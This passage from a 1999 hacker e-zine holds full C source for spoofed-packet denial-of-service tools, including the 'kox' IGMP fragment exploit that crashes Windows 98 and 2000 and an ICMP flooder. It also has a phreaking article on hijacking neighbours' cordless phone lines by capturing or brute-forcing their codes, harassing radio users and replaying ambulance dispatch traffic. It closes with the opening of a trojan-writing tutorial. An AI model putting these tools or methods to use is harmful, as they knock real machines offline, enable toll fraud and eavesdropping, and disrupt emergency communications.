                  sizeof(struct sockaddr_in)) == -1)
       {
         perror("Error sending packet");
         exit(-1);
       }
       if (ntohs(ip->frag_off) == 0x2000)
         break;
       len = 1500;
       if (!i)
         ip->frag_off = htons(0x2681);
       else
         ip->frag_off = htons(ntohs(ip->frag_off) - 185);

       ip->check = in_chksum((unsigned short *)ip, sizeof(struct iphdr));
     }
   }

   return(1);
 }

 unsigned short in_chksum(unsigned short *addr, int len)
 {
    register int nleft = len;
    register int sum = 0;
    u_short answer = 0;

    while (nleft > 1) {
       sum += *addr++;
       nleft -= 2;
    }

    if (nleft == 1) {
       *(u_char *)(&answer) = *(u_char *)addr;
       sum += answer;
    }

    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
    answer = ~sum;
    return(answer);
 }

 ----- cut ----- cut -----

 ----- kox.c ----- cut ----- cut -----

 /***
         Kox by Coolio (coolio@k-r4d.com)

         this was a successful attempt to duplicate klepto/defile's kod win98
         exploit and add spoofing support to it. me and defile made this a
         race to see who could do spoofing kod first. he won. (mine's better!)
         my kox and defile's skod output about the same packets
         but he had skod working a few hours before i had kox working.

         affected systems: windows 98, windows 98 SE, windows 2000 build 2000
         results: bluescreen, tcp/ip stack failure, lockup, or instant reboot

         thanks to klepto and defile for making kod, psilord for wanting
         to understand what we were doing, greg for telling me about iphdr.ihl,
         mancide for letting me use his win98 boxen to test on, and the
         few other people i crashed trying to get this working right.

         also thanks to the authors of elvis for making such a badass editor.
 ***/



 #include <stdio.h>
 #include <unistd.h>
 #include <stdlib.h>
 #include <netdb.h>
 #include <string.h>
 #include <errno.h>
 #include <pwd.h>
 #include <time.h>
 #include <sys/types.h>
 #include <sys/socket.h>
 #include <sys/utsname.h>
 #include <netinet/in.h>
 #include <netinet/ip.h>
 #include <netinet/ip_icmp.h>
 #include <netinet/igmp.h>



 void usage(char *arg)
 {
         printf("Kox by Coolio (coolio@k-r4d.com)\n");
         printf("Usage: %s <victim>\n", arg);
         exit(1);
 }


 unsigned int randip()
 {
         struct hostent *he;
         struct sockaddr_in sin;
         char *buf = (char *)calloc(1, sizeof(char) * 16);

         sprintf(buf, "%d.%d.%d.%d",
                 (random()%191)+23,
                 (random()%253)+1,
                 (random()%253)+1,
                 (random()%253)+1);

         inet_aton(buf, (struct in_addr *)&sin);
         return sin.sin_addr.s_addr;
 }

 unsigned short in_cksum(unsigned short *buh, int len)
 {
         register long sum = 0;
         unsigned short oddbyte;
         register unsigned short answer;

         while(len > 1) {
                 sum += *buh++;
                 len -= 2;
         }

         if(len == 1) {
                 oddbyte = 0;
                 *((unsigned char *)&oddbyte) = *(unsigned char *)buh;
                 sum += oddbyte;
         }

         sum = (sum >> 16) + (sum & 0xFFFF);
         sum += (sum >> 16);
         answer = ~sum;
         return answer;
 }

 int nuke_igmp(struct sockaddr_in *victim, unsigned long spoof)
 {
         int BIGIGMP = 1500;
         unsigned char *pkt;
         struct iphdr *ip;
         struct igmphdr *igmp;
         struct utsname *un;
         struct passwd *p;

         int i, s;
         int id = (random() % 40000) + 500;

         pkt = (unsigned char *)calloc(1, BIGIGMP);
         ip = (struct iphdr *)pkt;
         igmp = (struct igmphdr *)(pkt + sizeof(struct iphdr));

         ip->version = 4;
         ip->ihl = (sizeof *ip) / 4;
         ip->ttl = 255;
         ip->tot_len = htons(BIGIGMP);
         ip->protocol = IPPROTO_IGMP;
         ip->id = htons(id);
         ip->frag_off = htons(IP_MF);
         ip->saddr = spoof;
         ip->daddr = victim->sin_addr.s_addr;
         ip->check = in_cksum((unsigned short *)ip, sizeof(struct iphdr));

         igmp->type = 0;
         igmp->group = 0;
         igmp->csum = in_cksum((unsigned short *)igmp, sizeof(struct igmphdr));

         for(i = sizeof(struct iphdr) + sizeof(struct igmphdr) + 1;
             i < BIGIGMP; i++)
                 pkt[i] = random() % 255;
 #ifndef I_GROK
         un = (struct utsname *)(pkt + sizeof(struct iphdr) +
               sizeof(struct igmphdr) + 40);
         uname(un);
         p = (struct passwd *)((void *)un + sizeof(struct utsname) + 10);
         memcpy(p, getpwuid(getuid()), sizeof(struct passwd));
 #endif
         if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
                 perror("error: socket()");
                 return 1;
         }

         if(sendto(s, pkt, BIGIGMP, 0, victim,
            sizeof(struct sockaddr_in)) == -1) {
                 perror("error: sendto()");
                 return 1;
         }
         usleep(1000000);

         for(i = 1; i < 5; i++) {
                 if(i > 3)
                         ip->frag_off = htons(((BIGIGMP-20) * i) >> 3);
                 else
                         ip->frag_off = htons(((BIGIGMP-20) * i) >> 3 | IP_MF);
                 sendto(s, pkt, BIGIGMP, 0, victim, sizeof(struct sockaddr_in));
                 usleep(2000000);
         }

         free(pkt);
         close(s);
         return 0;
 }

 int main(int argc, char *argv[])
 {
         struct sockaddr_in victim;
         struct hostent *he;
         int i;

         srandom(time(NULL));

         if(argc < 2)
                 usage(argv[0]);

         if((he = gethostbyname(argv[1])) == NULL) {
                 herror(argv[1]);
                 exit(1);
         }
         memcpy(&victim.sin_addr.s_addr, he->h_addr, he->h_length);
         victim.sin_port = htons(0);
         victim.sin_family = PF_INET;

         printf("IGMP> ");
         fflush(stdout);
         for(i = 0; i < 10; i++)
         {
                 nuke_igmp(&victim, randip());
                 printf(".");
                 fflush(stdout);
         }
         printf("\n");
         fflush(stdout);
 }

 ----- cut ----- cut -----

 ----- l22dos.cpp ----- cut ----- cut -----

 #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>
 #include <sys/types.h>
 #include <sys/socket.h>
 #include <netinet/in.h>
 #include <netinet/ip.h>
 #include <netinet/ip_icmp.h>
 #include <arpa/inet.h>
 #include <errno.h>
 #include <unistd.h>
 #include <netdb.h>

 struct icmp_hdr
 {
     struct iphdr iph;
     struct icmp icp;
     char text[1002];
 } icmph;

 int in_cksum(int *ptr, int nbytes)
 {
     long sum;
     u_short oddbyte, answer;
     sum = 0;
     while (nbytes > 1)
     {
         sum += *ptr++;
         nbytes -= 2;
     }
     if (nbytes == 1)
     {
         oddbyte = 0;
         *((u_char *)&oddbyte) = *(u_char *)ptr;
         sum += oddbyte;
     }
     sum = (sum >> 16) + (sum & 0xffff);
     sum += (sum >> 16);
     answer = ~sum;
     return(answer);
 }

 struct sockaddr_in sock_open(char *address, int socket, int prt)
 {
         struct hostent *host;
         if ((host = gethostbyname(address)) == NULL)
         {
                 perror("Unable to get host name");
                 exit(-1);
         }
         struct sockaddr_in sin;
         bzero((char *)&sin, sizeof(sin));
         sin.sin_family = PF_INET;
         sin.sin_port = htons(prt);
         bcopy(host->h_addr, (char *)&sin.sin_addr, host->h_length);
         return(sin);
 }

 void main(int argc, char **argv)
 {
         int sock, i, ctr, k;
         int on = 1;
         struct sockaddr_in addrs;
         if (argc < 3)
         {
                 printf("Usage: %s <ip_addr> <port>\n", argv[0]);
                 exit(-1);
         }
         for (i = 0; i < 1002; i++)
         {
             icmph.text[i] = random() % 255;
         }
         sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
         if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1)
         {
             perror("Can't set IP_HDRINCL option on socket");
         }
         if (sock < 0)
         {
             exit(-1);
         }
         fflush(stdout);
         for (ctr = 0;ctr < 1001;ctr++)
         {
             ctr = ctr % 1000;
             addrs = sock_open(argv[1], sock, atoi(argv[2]));
             icmph.iph.version = 4;
             icmph.iph.ihl = 6;
             icmph.iph.tot_len = 1024;
             icmph.iph.id = htons(0x001);
             icmph.iph.ttl = 255;
             icmph.iph.protocol = IPPROTO_ICMP;
             icmph.iph.saddr = ((random() % 255) * 255 * 255 * 255) +
             ((random() % 255) * 65535) +
             ((random() % 255) * 255) +
             (random() % 255);
             icmph.iph.daddr = addrs.sin_addr.s_addr;
             icmph.iph.frag_off = htons(0);
             icmph.icp.icmp_type = random() % 14;
             icmph.icp.icmp_code = random() % 10;
             icmph.icp.icmp_cksum = 0;
             icmph.icp.icmp_id = 2650;
             icmph.icp.icmp_seq = random() % 255;
             icmph.icp.icmp_cksum = in_cksum((int *)&icmph.icp, 1024);
             if (sendto(sock, &icmph, 1024, 0, (struct sockaddr *)&addrs, sizeof(struct sockaddr)) == -1)
             {
                 if (errno != ENOBUFS) printf("X");
             }
             if (ctr == 0) printf("b00m ");
             fflush(stdout);
         }
         close(sock);
 }

 ----- cut ----- cut -----

 Well, that's it. I sincerely hope you will use the information above only
 for educational purposes, or at least with a good deal of restraint, because
 there is nothing more stupid than pointless attacks.

                                                                   15.8.1999
                                                                    IronCode

 >> EOA <<

 -ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú#08ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
  [ a r t i c l e ]                                         [ a u t h o r ]
  Phreaking RadioPhones and BigPhun                              Lud Phreak
 -ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-

     Part One. Advanced RadioPhreak


 After two articles on intercepting radio emissions, it is only logical to
 arrive at the idea of radio phreaking. I will cover several aspects of the
 topic, which, I hope, will continue in the following issues of PHREEDOM!

 Back in the early 90s, telephone extenders, two-way radios and other
 communication equipment multiplied en masse in Bulgaria. To a greater or
 lesser degree they are simply begging to be phreaked. Some are easy enough
 for that, while others require considerable knowledge of (radio)
 electronics. I will start with the radio phone for "home use". Examples are
 the Panasonic cordless phone and others like it, operating in the 46/49 MHz
 band. The exact channel frequencies are:

       Base         Handset                   Base         Handset
     -------------------------              ------------------------
       46.61 MHz    49.670  MHz               46.77 MHz    49.830  MHz
       46.63 MHz    49.845  MHz               46.83 MHz    49.890  MHz
       46.67 MHz    49.860  MHz               46.87 MHz    49.930  MHz
       46.71 MHz    49.770  MHz               46.93 MHz    49.990  MHz
       46.73 MHz    49.875  MHz               46.97 MHz    49.970  MHz

 The simpler models work as follows: the handset opens the base with a tone,
 a short sound with a frequency of about 5 kHz. The line is held open for as
 long as the base receives a signal from the handset. The same tone is used
 for pulse dialing of the number. If you dial 9, for example, the handset
 sends the base, along with its signal, 9 short 5 kHz bursts chopped the same
 way they would be dialed from the rotary dial of an ordinary telephone. At
 the end of the call (when hanging up), the handset usually emits a prolonged
 5 kHz signal of rising frequency, which is the signal to close the line. An
 exception for closing the line is the case where the signal from the handset
 becomes very weak. In that case the base waits a few seconds and, if there
 is no more radio signal from the handset, the line is closed.

     Means of "protection" for these phones:

 Usually there are either none, or there is a switch with several positions
 that changes the open/close frequency - it can vary from about 5 to about
 6-7 kHz.

     Ways to phreak:

 1. The simplest way is to walk around town with your phone, switching it on
    from time to time to see whether you happen upon another one on the same
    channel (there are only 10, after all) and with the same open/close
    frequency. Overall, the method with the fewest results. My advice - don't
    bother with this kind of approach. You can try it just as an experiment.

 2. If you want something more serious, you will need a computer with an SB.
    Since a laptop (with an SB at that) can rarely be used, and it is not
    particularly convenient to carry everything around, it is best to arm
    yourself with an external antenna as well. I will explain later how you
    can make an antenna. You will also need knowledge of electronics.

 The idea is the following:

 The base receives on its channel continuously. If the external antenna is
 connected to it, its range will increase as well. You need to find the chip
 with which the receiver is implemented. It is usually built with an MC3357,
 MC3359, MC3361 (Motorola) or an equivalent made by other companies. Once you
 find it, you need to connect the SB's LineIn to the receiver's low-frequency
 output pin (the direct output of the frequency discriminator) coming out of
 the chip. There you should hear noise similar to the noise of a UKW (VHF)
 receiver that is not tuned to a station; if you switch on your handset, you
 should hear your own voice. Use a program with which you can record what the
 base receives. If there is another handset nearby on the same channel as
 yours and the neighbour decides to blabber on his damn phone, the base will
 definitely receive it, regardless of whether the tone that opens it is (not)
 the same! If you have recorded the conversation, use some program with which
 you can view the sound file and run a frequency analysis on it. I use
 CoolEdit 96! Listen to the beginning (or the dialing); after the frequency
 analysis you will also know the frequency of the opening tone.

 What remains is to take apart your own handset as well and find the trimmer
 potentiometer for fine-tuning the handset's tone. Adjust it until it is on
 the same frequency as the neighbour's. Use the base and the computer as an
 aid if you do not have a frequency meter. What remains is to hook up the
 external antenna to the handset, switch off your own base and try the
 neighbour's phone. If something still does not work, compare again whether
 the frequencies match.

 If you have a Panasonic or similar phone, models from 2-3 years ago, you
 will have a bit more trouble. With those, opening, closing and dialing are
 done via a code generated by the phone's CPU. What is also bad is that this
 code changes when the handset is put on to charge. If you play around some
 more using the method above, you will be able to record the digital code as
 well, but then you will have to feed it from the computer into the handset's
 transmitter. For that you will also need the phone's schematics or
 considerable knowledge of electronics :-(


     Phreaking SENAO SN-889MCA or SN-688MCA: (Advanced Phreak)
     (BTW not only these models but other brands too :-)

 Lately long-range cordless phones are being imported. One such brand is, for
 example, SENAO (and others).

 The different models operate on different frequencies: 44/82 MHz;
 74/116 MHz; 72/134 MHz; 74/136 MHz; there are variants at around 2xx, 3xx,
 4xx, 8xx and 9xx MHz

 Model SN-889MCA uses the frequencies:
     72 MHz - transmitted by the base
     134 MHz - transmitted by the handset



 The phone is advertised with: 65536 sets security code (two-way)! - What,
 are they making fun of the phreaker? Having put in 65000 combinations, they
 think they have protected it.

 If you have a scanner you can determine the two frequencies the phone
 operates on. You will also need a two-way radio to be able to phreak them.

 The most convenient (in my opinion) is the SENAO model that operates on
 72/136 MHz

 With a two-way radio you can transmit on 136 MHz and listen on 72 MHz with
 the scanner. This model uses a 16-bit code for opening and closing and a
 4-bit code for the dialed digit.

 The open/close format is the following:

     Sync/4bit/16bit/Sync/4bit/16bit/Sync/4bit/16bit/Sync

 4-bit code:
     open :  1111
     close:  1011

 16-bit code: the phone's security code; it is one and the same throughout
 the whole packet!

 Dialing is: Sync/1100/4bit(digit)*4 times/Sync
 4-bit code for dialing a digit:
     1: 0111       6: 1001
     2: 1011       7: 0001
     3: 0011       8: 1110
     4: 1101       9: 0110
     5: 0101       0: 1010


 Sync :             +------+
                    |      |
                    | 10mS | 10mS     - 4 consecutive pulses are
                    +      +------+     transmitted


 Code (4/16bit):      +---+                 +----+
                      |   |                 |    |
                (1)   |4mS|4mS         (0)  |7mS |7mS
                      +   +---+             +    +----+

 BTW, I have a program developed for this phone. If anyone is interested,
 they can get it together with the source in P(r)ascal. Phreeware :-) The
 program works and has been tested. I have a variant for SB and for LPT. The
 program only transmits the code. Whoever has nothing better to do can think
 about how the code could be decoded directly from the receiver!

 The modulation used is FSK (Frequency Shift Keying), i.e. the transmitter's
 carrier signal is modulated directly. For this, the corresponding
 modification also has to be made to the two-way radio being used, so that it
 can transmit the digital (FSK) signal. It also matters whether the digital
 signal comes out inverted on reception. If so, it has to be inverted again
 before transmitting.

 This phone also changes its code when it is placed to charge. It keeps
 changing until the moment the handset is lifted from the base, and in
 practice there is no way to know what it will be. (BTW: it can also be
 changed remotely from the handset)

 Usually this type of phone has a long range and the handset gets carried
 around who knows where along with its owner. So the code most often changes
 in the evening, when the dumb bastard comes home (unless he suspects
 something and changes it from the handset).

 If you record the code in the morning, there is a high probability that it
 stays the same until the evening :-). If not, you will need a bit of
 patience to record some conversation and work out the code. Otherwise try
 Brute Force (if that is how it's spelled ;-), i.e. cycle through all
 possible codes, if you have the time :-P

 A few words about grabbing the code. You use the two-way radio, receiving on
 the handset's frequency. Again you need an output from the frequency
 discriminator (the receiver chip). Otherwise the FSK (digital) signal will
 be distorted beyond recognition by the amplifiers after it (the speaker
 amplifier, for example). Again use a recording program (as I said,
 CoolEdit96 for example). If there is no program for scanning the code
 directly from the receiver, look carefully at the pulses. You will clearly
 distinguish the longer (0) and shorter (1) pulses, and the Sync. You can
 write the code down on a slip of paper and then enter it into a program that
 can generate the RF protocol.

 With a UBC65XLT scanner and an Alinco DJ-S1 two-way radio I have phreaked
 these models without problems, with a duplex link. You listen with the
 scanner and transmit continuously with the radio throughout the whole call.
 BTW: you need the scanner only to listen to the signal from the base, so if
 you do not have a scanner, use a UKW receiver instead - the Russian
 standard. It can receive on 72-74 MHz :-). Use headphones, otherwise
 unpleasant acoustic feedback may occur while phreaking.

     Problems when phreaking radiophones:

 The dumb bastards usually connect one more (normal) phone alongside the
 cordless. This means that if you dial with a phreak, the other phone will
 jingle too :-(. So before anything else, keep track of whoever uses the
 phone. Find out (from the conversations, of course) at what time he is out
 and whether anyone is at home (e.g. whether he uses the intercom). If you
 are sure that nobody will hear the jingling, act boldly, and even if they
 notice you - you are sitting at home and there is nobody to figure out who
 you are and what you are fighting for :-). The problems come if you are
 talking and the guy goes and picks up the phone. If he picks up the other
 (normal) one, the line cannot be closed. So it is not a bad idea to warn the
 person you are talking to (e.g. at the start of the call) to hang up if the
 dumb bastard goes and opens his damn phone. You can also be more brazen:
 you just have to tell off the person who has picked up his own phone and
 convince him, with a curse or two, that he has stumbled into your
 conversation. That trick always works if some old auntie or neighbour lady
 picks up. Do not mention telephone extenders or anything related to phreak.
 Just pour your heart out against B(F)TK. Curse them calmly. The guy may even
 back you up! :-)))

 If things happen to go badly for you (hopefully not), for example the guy
 has figured out where the calls were dialed from, find a way to make it
 known that he has a radiophone. The bE(F)tEkArItE will pay him no attention
 at all. It is the problem of the guy who plugged in a "little phone with an
 antenna", and they will give him a hard time.

 BTW, this is the safest way to phreak. All the more so since those with
 SENAO phones are already being chased for not having a licence for the
 frequencies their phones are on. So PHREAK TO THE MAX!!!

     PART Two: Phun with the two-way radio :-)))

 If you get hold of a two-way radio for the (130)140-170 MHz band, you can
 have fun scanning the frequencies and eavesdropping on various services and
 people using the airwaves. The frequencies in this band are used roughly
 like this:

     134     - 136 MHz - RadioPhones
     144     - 146 MHz - Radio amateurs (Ham radio band)
     147     - 149 MHz - Military, MPolice
     150,150 - 150,200 - Mobikom - Pagers (nationwide)
     150,200 - 150,700 - Bulgarian State Railways (Big Phun)
     156               - Marine channels
     157,700 - 158,300 - Trunk (MPT1327) of the hospitals.
     165 MHz           - Police
     169,170 MHz       - Police

 This is only a sample list of how the frequencies are used. Besides these
 services you can also find the Fire Department, banks, phone extenders of
 various companies, and various pirates illegally (HaHaHa) using some
 frequency.

 If you pick someone up, listen for a while. If you decide that you can have
 fun with them, get ready for BIG PHUN. BTW, I do not recommend meddling
 with: police, MilPolice - they can locate where you are transmitting from
 (well, at least in the big cities); radio amateurs: they can locate you even
 faster than the police and MP; security firms - they hit hard ;-); and
 others who might have a licence for the radio frequency. But if you find
 someone who is not one of those, show no mercy :-)))

     Ideas:

 1. Record with the SB a few lines from those who call in. Once you have
    built up a vocabulary, start playing them on the channel. The one you
    recorded will not recognise his own voice, while everyone else will
    recognise him. The party begins :-)

 2. Make yourself a PARROT. That is a device (or program) that records
    whenever there is a signal on the channel and plays it back after the
    signal ends (it repeats everything on the channel). Those who have never
    heard such a thing will curse their heads off.

 3. Blow into the microphone. That has always infuriated the listeners. Do
    not listen to the curses aimed at you, but record them on the SB. Then
    use item 1!

 4. If the two-way radio has a DTMF keypad, make up some little melody, e.g.
    "Chorba-Kasha", "Zajchenceto bialo" etc. - play them from time to
    time :-)))))))

     Phreak with a transceiver:

 Things you can phreak with a transceiver:
     1. Pager - 150.175MHz 150.200MHz.
     2. Phone extenders with transceivers (Phone Trunk)
     3. MPT1327 Trunk - the hospitals - more for phun than anything useful,
        because they have no outlet to the phone network (at least I have
        not heard of one yet)
     4. Mobifons - range 450-460 MHz

 Notes:

 1. Software for the pagers - as much as you like. You only need to look
    around - the pagers use the POCSAG protocol. You will easily find
    something with any search engine, or send me mail about it.

 2. The phone extenders use DTMF tones. Find out the two channels they work
    on. Once you have the unlock combination you will have no problem. Take
    care not to overdo it, because quite a few of them have a computer for
    logging and it may get noticed. Digital trunks have appeared too. I
    still don't have enough info on them, so if you come across one, get in
    touch.

 3. MPT1327 trunks work with a digital signal in which 1 is encoded with a
    1200Hz tone and 0 with 2400Hz (it may be the other way round), at a
    baud rate of 1200 bps. If you record a call from some ambulance to the
    dispatch centre, you can replay it, open the trunk and curse out the
    dispatcher :-))).

    The interesting thing about them is that ASCII info about the calling
    station travels with the digital packet (it shows up on the little
    display of the stations in use).

 (Note, Iron - still, don't mess with the hospitals too much. After all they
  save human lives, and a prank like that may stop them from doing so. After
  all we are people, not monsters)

 4. The Mobifons work in duplex on 453-465MHz, with the cell transmitting on
    the upper frequency and the Mobifon on a frequency (exactly) 10MHz
    lower. If you have a transceiver for this range, transmit on the
    Mobifon's frequency. It makes for great PHUN!


 APPENDIX A
 ----------

 NFM DISCRIMINATOR CHIPS - BASEBAND AUDIO - SQUELCH GATE DATA
 ============================================================

 There is a growing interest in tapping the baseband audio out of various
 scanners for decoding of a variety of esoteric signals, including CTCSS,
 SCA, FSK, RTTY, FAX, etc. By and large, such signals cannot be taken from
 TAPE REC jacks, headphone jacks, and EXT SPEAKER jacks because of the
 voice-band filtering that is done between the signal source and these output
 jacks.

 Therefore, it is necessary to tap the "baseband audio" directly at the
 output of the discriminator chip for your scanner. The table below shows a
 list of scanners, the discriminator chip(s) used in the scanner, circuit
 symbols of those chips, and three pins of general interest on the chips:
 RF-Input, Scan Control, and, of course, the baseband audio pin.

 Even   though  your  scanner  may  not  be  listed,  if  you  can  find  its
 discriminator  chip,  it will be listed with one or more scanners below, the
 pins  of  which  will be the same for your unlisted scanner! Corrections and
 additions to this list are requested. See my mail and other addresses at the
 end of this file.

          SCANNER DISCRIMINATOR CHIP PINS OF INTEREST
                                 CKT     RF-in   SCAN    AUDIO
 SCANNER         NFM CHIP TYPE   SYMBOL  Pin     Pin   BASEBAND
 =============== =============== ======= =====   ===== =========
 Not known       MPS5071         n/a     16      13      9
 AR-1000         TA-7787AF       IC-4    16     none     9
 AR-2002         MC-3357P        IC-4    16      13      9
 AR-2500         TA-7761P        IC-13   Please verify?  9?
 AR-3000         MC-3357P        ?       16      13      9
 AR-800          MC-3361N        IC-200  16      13      9
 AR-900          MC-3361N        IC-201  16      13      9
 AR-950          MC-3361N        IC-201  16      13      9
 BC-100XL        MC-3359P        IC-1    18      15      10
 BC-100XLT       TK-10421M-2     IC-401  20      16      11
 BC-200XLT       TK-10421M-2     IC-401  20      16      11
 BC-205XLT       TK-10421M-2     IC-401  20      16      11
 BC-250          ?               IC-3    16      13      9
 BC-2500XLT      TK-10930VTL     IC-201  24      -     12-FM  13-AM
 BC-3000 NFM/AM  TK-10930V       IC-202  24      -     12-NFM 13-AM
 BC-3000 WFM     TK-10489M       IC-203  20     16-17    11
 BC-350A         NJM-3359D-A     IC-3    18      15      10
 BC-400XLT       NJM-3359D-A     IC-1    18      15      10
 BC-560XLT       NJM-3359D-A     IC-1    18      15      10
 BC-700A         NJM-3359D-A     IC-3    18      15      10
 BC-760XLT       NJM-3359D-A     IC-2    18      15      10
 BC-800XLT       MC-3359P        IC-1    18      15      10
 BC-8500XLT      MC-3361BP       IC-9    16      13      9
 BC-855XLT       TK-10421M-2     IC-401  20      16      11
 BC-890XLT       NJM-3359D-A     IC-3    18      15      10
 BC-950XLT       NJM-3359D-A     IC-2    18      15      10
 HX-1000         TK-10420        U-201   16      13      9
 MR-8100         NJM-3359D-A     IC-3    18      15      10
 MX-5000         MC-3357P        IC-4    16      13      9
 MX-7000         MC-3357P        IC-4    16      13      9
 PRO-2002        MC-3357P        IC-101  16      13      9
 PRO-2003        MC-3357P        IC-104  16      13      9
 PRO-2004 NFM/AM TK-10420        IC-2    16      13      9 (TP4)
 PRO-2004 WFM    KB4419A         IC-1    1       ?       6 (TP3)
 PRO-2005 NFM/AM TK-10420        IC-2    16      13      9 (TP2)
 PRO-2005 WFM    KA2243N/HA12413 IC-1    1       -      10 (TP1)
 PRO-2006 NFM/AM TK-10420        IC-2    16      13      9 (TP2)
 PRO-2006 WFM    KA2243N/HA12413 IC-1    1       -      10 (TP1)
 PRO-2011        TK-10420        IC-1    16      13      9
 PRO-2020        MC-3357P        IC-101  16      13      9
 PRO-2021        TK-10420        IC-2    16      13      9
 PRO-2022        MC-3361N        IC-1    16      13      9
 PRO-2023        NJM-3359D-A       ?     18      15      10
 PRO-2024        MC-3361N        IC-2    16      13      9
 PRO-2025        NJM-3359D-A     IC-1    18      15      10
 PRO-2026        NJM-3359D-A     IC-7    18      15      10
 PRO-2027        MC-3361N        IC-2    16      13      9
 PRO-2028        NJM-3359D-A     IC-2    18      15      10
 PRO-2030        NJM-3359D-A     IC-3    18      15      10
 PRO-2035 NFM/AM TK-10420        IC-2    16      13      9 (TP2)
 PRO-2035 WFM    KA2243N/HA12413 IC-1    1       -      10 (TP1)
 PRO-2042 NFM/AM TK-10420        IC-2    16      13      9 (TP2)
 PRO-2042 WFM    KA2243N/HA12413 IC-1    1       -      10 (TP1)
 PRO-23          MC-3361BD       IC-1    16      13      9
 PRO-26 NFM/AM   TK-10930V       IC-14   24      -     12-NFM 13-AM
 PRO-26 WFM      TK-10489M       IC-16   20     16-17    11
 PRO-31          TK-10420        IC-1    16      13      9
 PRO-32          TK-10420        IC-101  16      13      9
 PRO-34          TK-10420        IC-101  16      13      9
 PRO-35          TK-10421M-2     IC-401  20      16      11
 PRO-36          TK-10420        IC-101  16      13      9
 PRO-37          TK-10420        IC-101  16      13      9 (TP103)
 PRO-38          MC-3359P        IC-1    18      15      10
 PRO-39          MC-3361N        IC-201  16      13      9
 PRO-41          MC-3359P        IC-1    18      15      10
 PRO-42          MC-3361N        IC-2    16      13      9
 PRO-43          TK-10427/-10420 IC-301  16      13      9
 PRO-44          MC-3361N        IC-201  16      13      9
 PRO-46          TK-10421M-3LT   IC-401  20      16      11
 PRO-51          MC-3361BD       IC-1    16      13      9
 PRO-60          ?               IC-301  16      13      9
 Icom R-1 NFM    TK-10487 DET-A  IC-1    20      Q1      11
 Icom R-1 WFM    TA-7787AF DET-B IC-1    16      7       9
 R-1600          NJM-3359D-A     IC-2    18      15      10
 R-4030          TK-10421M-2     IC-401  20      16      11
 SR-15           TK-10421D-2     IC-1    16      13      9
 TurboScan 2     3130-6056-502   U-201   18      ?     10 or 16
 ====================================================================


 APPENDIX B
 ----------

 How do we make an external antenna?

 For different frequencies the size of the antennas also differs. In
 construction they can be one and the same.

 1. The simplest variant is a wire strung from the antenna output. For
    material you can use anything: copper wire, telephone wires. The length
    of the wire must be a multiple of the wavelength:

    For 46/49 MHz it should be about 1,60 m
    For 136 MHz the length should be about 55 cm.
    For 146 MHz the length should be about 50 cm.

    The formula for a 1/4-wavelength antenna is:

    lambda (the wavelength) = 300 / freq.             (freq in MHz)
    antenna length = lambda / 4                       (length in metres)

 You can use 50 Ohm (!) coaxial cable to take it out onto the roof.
 Constructions:

 (1)    │                             (2a)    │ ant - to the coax core
        │ant.                                 │
        │                                     │
        │                                     │
        │    coaxial                          0
        0-o========= = = =                   /│\ ----->gnd - coax ground (braid)
          B GND (ground)                   / \║/ \
                                         /    ║    \
                                       /      ║      \
               │                              ║
      (2b)     │                              ║coaxial
               │
               o    Top view           Side view
              / \
            /     \
          /         \

 (1) The simplest variant of the antenna: a wire connected to the coax. It
 is not among the best, since it is not matched to the cable. Even so it
 does a good job.

 (2a/b) A GroundPlane-type antenna. The system consists of a vertical rod
 connected to the core of the coax and 3 radial rods connected to the braid
 of the cable. The vertical rod and the other 3 rods are 1/4 lambda long.
 The three rods are spaced 120 degrees apart (top view) and tilted 45
 degrees relative to the horizon (the roof) - side view. Antennas like this
 were used back in the day in the TKZS collective farms :-). It gives better
 results, since it is better matched and has more gain than the previous
 one.

 You can also steal an antenna from a Senao phone; there are plenty of them
 on roofs. But afterwards you have to adjust the length of the rods. You can
 also use a TV antenna, but then the dimensions have to be calculated, and on
 top of everything else it will be directional - which for these purposes is
 a drawback :-(.

 Plenty of ideas. You can improvise as much as you like. For more info and
 help - there is mail for that (and #phm and #phreak too ;-)!

 If there is interest in this kind of phreak, I will prepare another
 article :-) If you have ideas for other radio-phreak, or want more info or
 technical consultation (you can also curse me out if you like :-PPP), write
 to the mail: ludphreak@yahoo.com

 LudPhreak

 >> EOA <<

 -·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·#09·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-
  [ a r t i c l e ]                                         [ a u t h o r ]
  The Gentle Art of Trojan Horsing w/Windows                            EXo 
 -·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-

   i. Intro


 I find it very hard to come up with an introduction to this article, since
 a lot of material has already been written on the topic, and this issue is
 hardly short of it either. Even childless mothers and tramps have heard of
 trojan horses by now, even the BTC people. It is probably best, before you
 give up on Phreedom Magazine altogether, that I assure you there is no
 cause for worry if you are simply sick of hearing about trojan horsing,
 because, although the topic is among my favourites, it has been fairly well
 exhausted, and an article as fat as this one is very unlikely to appear in
 Phreedom Magazine again soon. Still, I have tried to cover all the more
 interesting points connected with the creation, distribution and operation
 of trojan horses that have not been covered so far in previous issues.

 I make no claim to being exhaustive, and if anyone has interesting ideas,
 send them in boldly. I wavered for a long time over whether to throw in
 what is already in the old issues on the topic and end up with a complete
 tutorial, but I decided that we cannot write the same thing in every issue,
 so whoever wants to can go and look at the previous publications. God
 willing, some day Solar and I will get together and write an extensive
 article on horsing, which will have everything from fake horses to VxD
 coding [2][5] and advanced sniffing techniques.

 (Note: Everything related to CC phishing can be found in the article by
        Star Gruhtar).

 The paragraph above will probably do for an intro, and before I begin the
 substantive part I will only say that writing trojan horses is not nearly
 as complicated as is thought by those who use ready-made junk of the Back
 Orifice and NetBus sort, brazenly titled "remote administration toolkits".
 I think it is clear to everyone that you are expected to have minimal
 knowledge of Windows programming, as well as some help files [10] and a
 compiler [2] at hand, and even a little desire to make something yourself
 rather than get everything ready-made.

